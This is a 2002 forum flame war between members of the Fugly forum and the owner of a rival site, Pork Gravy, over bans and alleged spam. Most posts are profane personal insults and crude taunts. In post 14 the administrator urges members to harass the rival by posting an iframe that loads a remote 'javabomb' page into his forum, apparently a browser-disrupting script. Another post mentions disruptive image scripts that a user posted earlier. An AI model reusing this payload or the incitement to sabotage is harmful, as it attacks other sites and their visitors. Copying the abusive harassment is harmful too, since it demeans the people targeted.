Porksausage

Discussion in 'General Mayhem' started by battlesausage, Mar 6, 2002.

1. battlesausage

battlesausage New Member

I went to pork gravy after that guy posted in this forum and I have to say that it is the worst-fucking rip off I have ever seen. The whole site is an extremely low quality copy of fugly. They host the loneliest forum on the net. It’s absolutely fucking despicable.

2. Nursey

Nursey Super Moderator

Despicable and preposterous...i think the whole internet carbuncle of a site should promptly be shut down without further ado...i mean,it's just not cricket!

3. kitana

kitana New Member

no no no...

4. Guest

Guest Guest

shuckz... i sure wish ya'll would quit picking on me.

(I give a shit)

5. Nursey

Nursey Super Moderator

*GASP*...GOOD LORD AND HEAVENS ABOVE!!!It is HE!!!The cad from the internet carbuncle on humanity!

6. battlesausage

battlesausage New Member

IMC Why dont you ban that guy so he cant spam on this site anymore? Did he not ban you?

7. kitana

kitana New Member

<BLOCKQUOTE><font size="1" face="verdana">quote:</font><HR>Originally posted by Battlesausage:
    IMC Why dont you ban that guy so he cant spam on this site anymore? Did he not ban you?<HR></BLOCKQUOTE>

i dont think IMC can do that, it has to be Martin

8. Dwaine Scum

Dwaine Scum New Member

<BLOCKQUOTE><font size="1" face="verdana">quote:</font><HR>Originally posted by skeeter:
    shuckz... i sure wish ya'll would quit picking on me.

(I give a shit)
    <HR></BLOCKQUOTE>

obviously you do or you wouldn't keep posting here... And you are a coward, for banning my username and all...

9. CancerBeans

CancerBeans Member

Battlesausage continues what IMC said in the pork gravy forum. Congrats retard

10. GreenAppleSplatters

GreenAppleSplatters New Member

<BLOCKQUOTE><font size="1" face="verdana">quote:</font><HR>Originally posted by Paranoid Kit:

i dont think IMC can do that, it has to be Martin
    <HR></BLOCKQUOTE>

Why don't you offer some favors to Martin and get him to do it? You being his bitch and all...

11. kitana

kitana New Member

<BLOCKQUOTE><font size="1" face="verdana">quote:</font><HR>Originally posted by Splatty bo Batty:

Why don't you offer some favors to Martin and get him to do it? You being his bitch and all...
    <HR></BLOCKQUOTE>

WTF?
    i dont want anyone kicked off of anything...
    and i am NOBODY'S bitch

12. Guest

Guest Guest

oh wait, I banned you? my bad, I'll be sure to get on that right away...

13. Dwaine Scum

Dwaine Scum New Member

and ill make sure to get back to your forums right away also

14. Fugly

Fugly Administrator Staff Member Fugly Staff

I removed Skeeter's account and banned his address. I do not want little 14 year olds spamming in here. If you want to fuck with him, just post this in his stupid forum:

<IFRAME WIDTH=468 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000" SRC="http://prufrock.virtualave.net/javabomb/wait2.html"></iframe>

15. Beulah

Beulah New Member

ok, I've been watching this stuff go back and forth for like the past 3 weeks, keeping an unbiased outlook and I've come to my conclusion.

What the hell, ya'll?! I thought the name of this forum was:

<BLOCKQUOTE><font size="1" face="verdana">quote
    All of ya'll got your panties in a wad for skeet banning IMC after he posted fucked up image scripts throughout the forum purposely screwing it up, and if that's not a decent reason for banning somebody, then I don't know what is. But banning skeet because you didn't like everything he said? He never did anything to screw this forum (true-shithole) up.

It's even worse when the fugly admin doesn't even know what the hell is going on, but bans him because somebody as lame as IMC or whoever, told him to. Just the fact that he thinks skeet is 14 is your first clue that he doesn't know what’s going on. Plus encouraging everybody to post that script is a shot below the belt too.

And how was he spamming this forum? He never once came in here telling people to go to his site. hell, ya'll always talking about PG was more of a plug than his sig ever was. So what if he put his URL in his sig! Nursey plugs some stupid shit in her sig, IMC is just annoying, and even one of your most hardcore members is a regular to PG (kitana).

I'm no longer non-biased. It’s obvious who the real shiteaters are.

16. Beulah

Beulah New Member

oh and btw, the description for the forum just reinforces the hipocrisy:

<BLOCKQUOTE><font size="1" face="verdana">quote
    Not moderated my ass, but it is right about being the worst forum on the net.

17. unlimited-time

unlimited-time Active Member

Lmao...nob!

18. pimpchichi

pimpchichi Active Member

you've been watching this for 3 weeks.. yet you missed the bit where i quoted skeeters first ever post.. the one where he posted a link to porkgravy...

anyway.. who gives a shit what you think "cookie"... not i

19. Nursey

Nursey Super Moderator

Nursey plugs a link to a site which

1)is not mine-im not advertising-trying to scoop punters
    ...and
    2) is totally dissimilar to fugly.

It's information which personally i think is beneficial,if you think it's crap information,fine,if not-then i'm happy to pass it on.
    Fuck you.

20. pimpchichi

pimpchichi Active Member

anyway.. i see you're still a whiny cocksucker funbobby.. fully deserving of your forum-bitch title still